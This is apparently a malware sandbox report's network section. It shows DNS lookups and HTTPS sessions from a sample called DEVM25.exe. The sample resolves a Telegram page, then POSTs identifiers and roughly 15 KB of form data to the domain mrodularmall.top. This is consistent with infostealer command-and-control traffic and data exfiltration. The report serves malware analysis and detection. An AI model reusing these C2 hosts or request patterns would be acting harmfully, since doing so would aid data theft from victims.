Mar 14, 2025 11:47:23.669115067 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.669122934 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669152021 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.669197083 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669286013 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669320107 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.671780109 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.671797991 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.671808958 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.671814919 CET	443	49696	188.114.97.3	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 11:47:10.810758114 CET	62173	53	192.168.2.9	1.1.1.1
Mar 14, 2025 11:47:10.817517996 CET	53	62173	1.1.1.1	192.168.2.9
Mar 14, 2025 11:47:11.960777998 CET	62050	53	192.168.2.9	1.1.1.1
Mar 14, 2025 11:47:11.969837904 CET	53	62050	1.1.1.1	192.168.2.9
Mar 14, 2025 11:47:12.012783051 CET	58977	53	192.168.2.9	1.1.1.1
Mar 14, 2025 11:47:12.021552086 CET	53	58977	1.1.1.1	192.168.2.9
Mar 14, 2025 11:47:12.022856951 CET	53136	53	192.168.2.9	1.1.1.1
Mar 14, 2025 11:47:12.031980991 CET	53	53136	1.1.1.1	192.168.2.9
Mar 14, 2025 11:47:22.746340990 CET	65365	53	192.168.2.9	1.1.1.1
Mar 14, 2025 11:47:22.771644115 CET	53	65365	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 14, 2025 11:47:10.810758114 CET	192.168.2.9	1.1.1.1	0x8e2d	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:11.960777998 CET	192.168.2.9	1.1.1.1	0x3011	Standard query (0)	menuedgarli.shop	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.012783051 CET	192.168.2.9	1.1.1.1	0x1cf8	Standard query (0)	featureccus.shop	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.022856951 CET	192.168.2.9	1.1.1.1	0xec70	Standard query (0)	mrodularmall.top	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:22.746340990 CET	192.168.2.9	1.1.1.1	0x1df4	Standard query (0)	jowinjoinery.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 14, 2025 11:47:10.817517996 CET	1.1.1.1	192.168.2.9	0x8e2d	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:11.969837904 CET	1.1.1.1	192.168.2.9	0x3011	Name error (3)	menuedgarli.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.021552086 CET	1.1.1.1	192.168.2.9	0x1cf8	Name error (3)	featureccus.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:12.031980991 CET	1.1.1.1	192.168.2.9	0xec70	No error (0)	mrodularmall.top		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:22.771644115 CET	1.1.1.1	192.168.2.9	0x1df4	No error (0)	jowinjoinery.icu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 14, 2025 11:47:22.771644115 CET	1.1.1.1	192.168.2.9	0x1df4	No error (0)	jowinjoinery.icu		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

mrodularmall.top

jowinjoinery.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49683	149.154.167.99	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:11 UTC	61	OUT	GET /asdawfq HTTP/1.1 Connection: Keep-Alive Host: t.me
2025-03-14 10:47:11 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 14 Mar 2025 10:47:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12328 Connection: close Set-Cookie: stel_ssid=13fe98fc6205fb6c6f_8582476919581480070; expires=Sat, 15 Mar 2025 10:47:11 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-03-14 10:47:11 UTC	12328	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49684	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:12 UTC	265	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 65 Host: mrodularmall.top
2025-03-14 10:47:12 UTC	65	OUT	Data Raw: 75 69 64 3d 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 26 63 69 64 3d Data Ascii: uid=a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20&cid=
2025-03-14 10:47:12 UTC	784	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:12 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7JagSjR2%2FIRwbRjgCelqJhyZVrEQ0ueWPugp1SyblPsFe0VX6Z%2FjQRVu5JXKAnGnfwXOcPW28UsGVoYsQG3nGYymTb4age%2FnZRCEySJr6sXvo7tR%2B%2BJMaV5qHUEJUCte7WQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9203310f9e57c344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1474&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=966&delivery_rate=1935056&cwnd=234&unsent_bytes=0&cid=2c333ce16eab73d6&ts=448&x=0"
2025-03-14 10:47:12 UTC	585	IN	Data Raw: 9b e8 28 7c 44 ac 03 a6 fd e9 08 55 4c 9d a4 f0 c9 d2 45 ba b4 fe 38 13 4d 00 16 87 10 d2 5a 60 b5 e2 f5 25 04 1c 43 82 cb 01 5c 75 f8 ff 19 78 1e 4e 43 f6 0e 9d 07 43 a4 c6 12 16 39 0e 16 a8 4f d0 d7 f2 4e b0 ce 0e 66 d9 70 f4 45 06 79 1c ec 83 af 33 85 2d a8 03 1b 45 e3 be 17 1f 11 03 15 a6 be 44 06 c0 23 ec 94 62 28 04 61 05 b3 b6 cf 41 b0 a2 cd 91 07 84 58 38 87 a9 f6 04 76 6a 3e 26 a7 cd a3 88 bc f8 8f 65 3b 64 d1 41 d2 26 af fa 44 a8 c6 9a 16 ae 6d 03 58 f4 6d 50 77 d4 ee d1 c5 a8 9f f1 30 80 c7 89 73 68 d6 f9 28 07 38 4c 88 16 45 a4 fe ee ef 2a 31 3f e4 9b 0a bb 13 ad 50 39 77 65 27 cf 1d ff 0e f2 e6 50 ab 13 f1 00 8e 99 16 b8 87 9f 47 ca 04 c1 47 90 05 99 06 cd a1 1c 69 b5 0e 85 eb 4f 2b c1 ec 0f 56 9d 40 32 a5 b4 d4 4d 31 62 14 6f b9 0b b1 6f ca Data Ascii: (\|DULE8MZ`%C\uxNCC9ONfpEy3-ED#b(aAX8vj>&e;dA&DmXmPw0sh(8LE*1?P9we'PGGiO+V@2M1boo
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: 51 ed 89 30 86 ce 83 6e 58 6e 22 d1 62 d4 52 80 db 6e 07 a6 42 a9 2d 0a 4a d8 7d 29 45 33 22 99 90 26 79 ac 3f 68 79 ba 8e 4f 17 f3 c2 2a e4 21 4f 3c 16 b0 41 05 34 50 e2 13 e8 d0 09 af bc 2d e5 45 98 5a c9 6c 50 89 c0 15 05 de a2 f4 1e d5 97 9a 57 83 6b 2e 6d 8d 2f 3e 41 20 c1 71 4e cd 86 3e dc 13 7e c0 80 4d e8 68 e0 6e b2 5d d2 29 e0 a9 db dc 76 af 7d 01 d4 d4 7a 03 24 7a 35 dd 15 ce 46 9b 22 d1 02 fc e7 5f ac 36 84 bb f0 d7 a6 d9 bd 7d 83 4e b9 de bc 25 82 81 17 68 89 1c 30 97 b4 ed 46 46 9c ce 2c 16 e6 0f cb bc 2f 60 cb 4b 00 8c a8 4c 9a da f9 cc c2 fa 3c 2d d6 ff 0f 2b fd 32 19 76 cf df f7 2c ac 06 06 39 23 65 e8 2c 62 71 04 08 9c be 52 e0 56 d4 c3 f1 5f 32 17 3c 99 12 0f c9 81 24 3f 65 73 e6 83 b5 57 26 17 a2 d3 45 88 f2 c6 97 eb 06 da f0 b5 8e 1d Data Ascii: Q0nXn"bRnB-J})E3"&y?hyO*!O<A4P-EZlPWk.m/>A qN>~Mhn])v}z$z5F"_6}N%h0FF,/`KL<-+2v,9#e,bqRV_2<$?esW&E
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: c2 04 30 31 01 1b 70 de 07 d6 bf 55 f0 b0 8f 6c 2e df b5 b6 ba 48 14 c4 0f b4 0b 33 92 55 9c 40 0a e2 ad 4a 9d cb 72 31 74 27 a4 04 7e 92 8c 18 77 fd 1b a9 1e cc 19 e2 44 dc f5 f3 44 4c cd 07 30 45 6e 53 2b 47 88 87 90 8c 7d ad 13 d0 4e c8 ca 82 f5 cf 04 4a c4 ef f0 1b bc 7a 07 cc f3 d4 3a 80 47 63 ce b7 06 e4 b6 71 21 1a 29 bb 23 fe 91 ae fc 48 52 3f 02 f3 4b f7 5a b7 e2 ab df 2f 9e 81 aa 3b d4 fb 66 a6 2e a5 d0 6c cf df 17 2f 95 7f cc 5b 50 02 93 de 9e c5 b5 22 6e f7 b9 b7 47 1a 25 6c f9 4a 84 c7 0b 20 87 12 0c 77 3c 7b b4 ec 42 7d 13 b2 19 f5 b7 b2 2b ab 14 8c 4d 24 03 70 25 86 3c 5f b4 a2 4b c3 dd 20 97 78 4d a9 91 53 64 ab 67 96 97 78 24 e0 1a b6 af d8 7d 20 54 84 c9 39 1a 4f 83 e9 0e f6 25 f7 2c 39 a3 46 e2 ba 5d 61 3d 95 42 36 fd 58 e8 b0 6d 57 0d Data Ascii: 01pUl.H3U@Jr1t'~wDDL0EnS+G}NJz:Gcq!)#HR?KZ/;f.l/[P"nG%lJ w<{B}+M$p%<_K xMSdgx$} T9O%,9F]a=B6XmW
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: 16 0f 04 5d 19 fe cf ac 77 e7 a3 ff 0b 00 db 5b 7b 0f 78 40 2c 89 f8 55 56 99 83 10 1b 00 09 d6 4a 79 0a 86 00 cf d6 56 54 45 c8 36 25 26 0b 37 cb 4f 6b c3 ee 4a 7e 17 77 93 93 82 19 af 9a b0 d4 99 4a 20 4c 23 8d 49 68 a5 f8 dd bf 4a 35 a3 91 26 09 ba c7 fa 72 93 12 cb 5c 85 00 dd 09 23 a8 2c 7e 24 34 cd ca 77 ee a3 69 dd 21 ec 45 ad c5 c6 b6 84 cd 74 c3 5f 56 7c de f9 fd ae d5 ce 7e cf b4 de 82 48 1a 20 f9 67 64 2e 43 2d 24 28 d3 cc 65 83 cf c2 3f d0 56 53 93 60 b9 20 05 ab da d1 1a 15 96 e2 32 db 6d a9 9f 89 45 0b bf 0a 4f c5 16 ea b6 0b a7 79 4c f3 c3 a3 e8 87 d0 dd 6e 4d 60 41 08 95 18 ae 84 23 30 71 f4 a7 3f bb 63 37 ea 3b 2f a5 fb ae 2a 8e 40 62 07 f2 2c 0c 5f 8c 6b 0e a6 c6 4f 59 4e f4 8a bf de 8d 5b c3 ed ff 48 d9 68 81 a5 11 11 80 98 c6 f3 b1 c8 Data Ascii: ]w[{x@,UVJyVTE6%&7OkJ~wJ L#IhJ5&r\#,~$4wi!Et_V\|~H gd.C-$(e?VS` 2mEOyLnM`A#0q?c7;/*@b,_kOYN[Hh
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: 3a ae 66 9a 45 52 c5 f5 d0 ac 3d 62 ac dd 09 39 84 9f 96 af f3 13 ef 9d d4 3e 51 4e a2 ff a8 ce e5 35 1a 93 27 40 42 55 be a3 37 7d ee 1d a0 c3 e9 95 db 74 45 2a 45 71 9f c6 ac 7c 62 00 10 27 c2 09 23 ef 03 a6 71 46 ab e3 f4 28 71 56 a1 18 49 d5 9c 70 d7 a3 b3 df be bf b3 1e c3 bb 14 f5 2f 5b 6b c2 1a ef 92 0c 8d 33 de 30 da 8f 14 31 4d c8 b9 6a bc b5 c6 a8 df bf 4e 67 bb 01 22 02 d0 13 1c 50 5a 47 8f 4b 7f 68 6c 8c 8a e1 01 01 8f f2 33 ff ee 87 22 52 58 aa cd 90 e2 9b 48 7b 2e cb c2 b8 ea 5f a0 45 e6 18 80 df 23 24 29 f8 60 ea 63 29 1c 4d db 8d e0 76 bd d1 32 a7 6e a7 e8 0c 7d 13 19 f4 d6 00 a2 07 95 fa 96 66 6a 66 45 b4 6e db 70 74 51 38 d4 33 e2 d2 33 ea 80 1e ec c7 5e d5 f0 5c fd b1 b4 88 cc 21 94 ff 70 3a 58 9c d8 bc 21 67 76 97 d0 dc 3b 67 c4 fc 51 Data Ascii: :fER=b9>QN5'@BU7}tE*Eq\|b'#qF(qVIp/[k301MjNg"PZGKhl3"RXH{._E#$)`c)Mv2n}fjfEnptQ833^\!p:X!gv;gQ
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: 37 6a 02 57 d6 7d 27 0f b5 c2 46 20 7e 39 06 fd f9 50 25 93 d8 32 7f 5c 8c 30 b6 86 9f 49 a2 1a b3 3a 43 26 50 c2 42 b4 83 fd 0f 6c 8b 41 12 bd 86 b1 cc 4d e2 f5 85 d2 14 45 01 cf d7 e2 f2 0d 90 c6 85 ea 57 66 7e be 06 01 14 b8 b5 80 82 4e db 56 55 47 3b 12 f4 90 d4 40 28 87 0f b4 86 d3 5e d1 18 75 a7 7e e0 42 70 6a 8f 2f cf 63 cb c6 66 62 d5 84 77 b0 11 39 f3 2b 6f 76 40 9a a5 f1 f2 55 53 e1 d8 9f a1 2d c0 64 da 8e 3b 41 76 54 ef 22 22 f8 f7 87 be 9e 61 54 05 e9 4c 33 3e 5e a0 01 ed 12 70 49 24 29 65 e8 10 18 67 5d 04 6d 71 be 6e d1 c2 cb 45 b5 f0 ef 8c 9b 2a 94 bf 3f 5f 14 19 0b a8 d1 67 ef 17 ed fe 94 77 a7 b7 69 25 ec 6d 64 90 45 be 5b 08 eb 78 86 b6 b9 d8 a1 df f1 75 12 78 55 68 fd da 2f 56 71 78 20 8f 27 2f 83 0b 34 a9 3c 9d ed a5 db 70 d1 f4 94 4f Data Ascii: 7jW}'F ~9P%2\0I:C&PBlAMEWf~NVUG;@(^u~Bpj/cfbw9+ov@US-d;AvT""aTL3>^pI$)eg]mqnE*?_gwi%mdE[xuxUh/Vqx '/4<pO
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: d4 65 c7 61 c9 27 5c a4 46 b3 3d 1b 87 ba 6d 2d 91 7c 9c 37 69 81 2d e5 d5 3b 42 85 ac 44 9f 66 d8 55 7a 1c 32 83 7a 6a 0e 76 dc fa 1e f4 c2 79 e8 e9 83 23 cc cd cd 67 7c 21 05 e4 fb 0a 00 7a 0c 8c cb 9d 86 8a a0 1e 0a cd 24 f5 72 3c 64 b8 b2 00 cb 55 e7 e0 1f 8c 60 3e 88 f7 be cc 99 04 8e 6a 1e a5 71 5a f3 58 ef 08 44 97 bf 12 00 12 c3 e2 e3 d2 b7 54 9f 2f 57 ea 0b dd 6f 80 8c 24 cb 99 df 01 c8 ea 33 99 d6 9f f4 7e c2 89 d9 16 8c b9 28 1c d1 ea a3 60 e3 f7 40 1e 37 23 af 23 63 d0 24 7c db 6a e0 44 f1 d8 6b 23 53 60 5f c6 70 f4 d6 46 64 72 63 29 74 65 b5 7a d4 45 c3 b4 f1 19 9b fd 64 d8 28 71 16 2b 64 08 56 c8 e6 20 8f b0 8d 97 7e d9 66 ab a8 92 9b aa b7 c4 78 a9 ca 80 e3 bc 26 3d 0b 67 75 b8 ea 3c a0 85 65 ea fa 4a 43 94 fc db b2 09 dd 83 f4 d7 c2 3d f6 Data Ascii: ea'\F=m-\|7i-;BDfUz2zjvy#g\|!z$r<dU`>jqZXDT/Wo$3~(`@7##c$\|jDk#S`_pFdrc)tezEd(q+dV ~fx&=gu<eJC=
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: ca 27 f6 64 03 56 93 9e 7a b2 55 06 51 da ee 6d 4a 4f 8e a9 51 67 62 ef df a5 4d 5a 3a 25 3c 13 1c 80 66 01 4e fb 0c 25 a1 1b a6 61 29 70 01 d6 56 d0 3a ba 48 f8 0b d0 32 1d 47 29 11 1a 80 da b4 d9 6c cf 8a a9 32 5d f3 fe 8f cc 32 b1 44 2e 58 77 b2 1c 77 7f 45 e1 6a 84 37 25 57 f0 81 37 68 06 d4 90 5a d1 14 e7 f3 85 d5 88 e0 66 3b ef 7a 75 0b 34 e2 e0 dd 19 d7 af a5 97 c6 a2 9a 31 24 9a a7 e0 34 1b 26 3e 24 aa aa 1b da 05 55 14 54 9f a3 7d b2 cb df 29 8e f5 0d 98 e8 a2 22 ed 0a 7b 2a 73 b7 b8 6f 70 c0 5c 43 8e 0e de 63 b3 9a 64 c2 94 ca 72 1e 4a 12 91 6f a7 dc d3 a6 af d1 08 06 dc f0 16 18 22 f0 0b 15 6f 13 6c 1b 01 0d ff a0 8e 2c 2c 43 ed 25 39 9f 66 0d cc e6 26 3e 30 72 d3 34 14 37 7e 73 0c ad 53 16 69 c4 70 ee 06 a1 60 79 41 7e b0 f0 05 f5 3f 83 1c 7a Data Ascii: 'dVzUQmJOQgbMZ:%<fN%a)pV:H2G)l2]2D.XwwEj7%W7hZf;zu41$4&>$UT})"{*sop\CcdrJo"ol,,C%9f&>0r47~sSip`yA~?z
2025-03-14 10:47:12 UTC	1369	IN	Data Raw: 71 bd 90 19 19 52 08 3e 2b 44 ec ac eb c6 1e 4c 5d c0 41 d0 c0 ab 32 a4 e9 64 35 0e 61 89 f0 65 b8 2e 76 85 26 b7 df 41 83 7d 07 9f 55 5a 6b 19 fb 37 7f b5 7f 50 67 a1 33 8b 84 a4 db ec a8 9f 33 6a 41 1d 28 a3 16 93 15 c5 8f c5 64 69 8c a6 94 3e e6 3d ee d4 e1 66 cd e8 bf 95 30 34 84 d6 e7 53 7b 78 14 37 a0 eb 5b c7 70 b2 c7 c3 f5 42 f1 7d 98 cf 85 fa 7f 03 f3 35 4b fc a7 c3 81 4b 23 20 51 ca 0d 2a bb 60 73 a0 7b 11 e9 3a 75 d4 82 0c 38 d3 7e 97 df 69 72 c8 7e 21 3d f2 c2 fc 4c 33 b4 ce 91 a8 7e d5 2f f8 e1 9f 48 91 e2 6d 64 08 ea 7a c0 03 8b 30 f0 f1 ce 60 f6 59 a2 e3 e2 e2 db fe fb 51 e5 75 78 4e 48 e6 14 dc 25 d1 01 0d d5 11 b5 39 b7 8e 2a 62 4c 2c cf e1 f1 c9 2a aa 65 6b ba c5 b8 1e 98 38 7e fb b2 d3 ba a8 e4 c5 d6 39 aa 0e a3 f0 98 ce 3f ca 7c a0 b3 Data Ascii: qR>+DL]A2d5ae.v&A}UZk7Pg33jA(di>=f04S{x7[pB}5KK# Q`s{:u8~ir~!=L3~/Hmdz0`YQuxNH%9bL,*ek8~9?\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49685	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:14 UTC	275	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=v26S4tXtW0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14915 Host: mrodularmall.top
2025-03-14 10:47:14 UTC	14915	OUT	Data Raw: 2d 2d 76 32 36 53 34 74 58 74 57 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 0d 0a 2d 2d 76 32 36 53 34 74 58 74 57 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 32 36 53 34 74 58 74 57 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 36 38 43 33 31 37 36 44 31 46 33 Data Ascii: --v26S4tXtW0Content-Disposition: form-data; name="uid"a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20--v26S4tXtW0Content-Disposition: form-data; name="pid"2--v26S4tXtW0Content-Disposition: form-data; name="hwid"9A68C3176D1F3
2025-03-14 10:47:15 UTC	816	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntNLOo2sObcXWyVxJ7Abr%2BozRt03qdP4GY8W0OsSX2u%2FihUFUNASHZ%2BjV1aleaBlH2RpOBwClMQWrr9C%2FYaIjVoTpys6AKufYFnkxQaXfxQCuEHKAePxRp6AG7ZO92F%2B8xPI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9203311ead490f39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1451&rtt_var=561&sent=13&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15848&delivery_rate=1919789&cwnd=231&unsent_bytes=0&cid=a048ea14fd340cab&ts=819&x=0"
2025-03-14 10:47:15 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
2025-03-14 10:47:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49687	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:15 UTC	283	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8rnleC74sP3YDM0GB7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: mrodularmall.top
2025-03-14 10:47:15 UTC	15071	OUT	Data Raw: 2d 2d 38 72 6e 6c 65 43 37 34 73 50 33 59 44 4d 30 47 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 0d 0a 2d 2d 38 72 6e 6c 65 43 37 34 73 50 33 59 44 4d 30 47 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 72 6e 6c 65 43 37 34 73 50 33 59 44 4d 30 47 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: --8rnleC74sP3YDM0GB7Content-Disposition: form-data; name="uid"a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20--8rnleC74sP3YDM0GB7Content-Disposition: form-data; name="pid"2--8rnleC74sP3YDM0GB7Content-Disposition: form-data; name
2025-03-14 10:47:16 UTC	817	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8HQlagxEeZFXDbUDhI4D1DFJaQGhj7Ck4b8PoTPFxhTD7YoAZYH3%2B9IFhSWJ6HZQ%2Foe1WGisNF1xZLddpvNMuUPP0%2BSxlBS%2BA%2FEE2erTkleYZJAnSPVPUCz%2FaUwzgumRe3G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 920331251d7a183d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1633&rtt_var=660&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16012&delivery_rate=1600000&cwnd=252&unsent_bytes=0&cid=410889ce0ecf4ef2&ts=513&x=0"
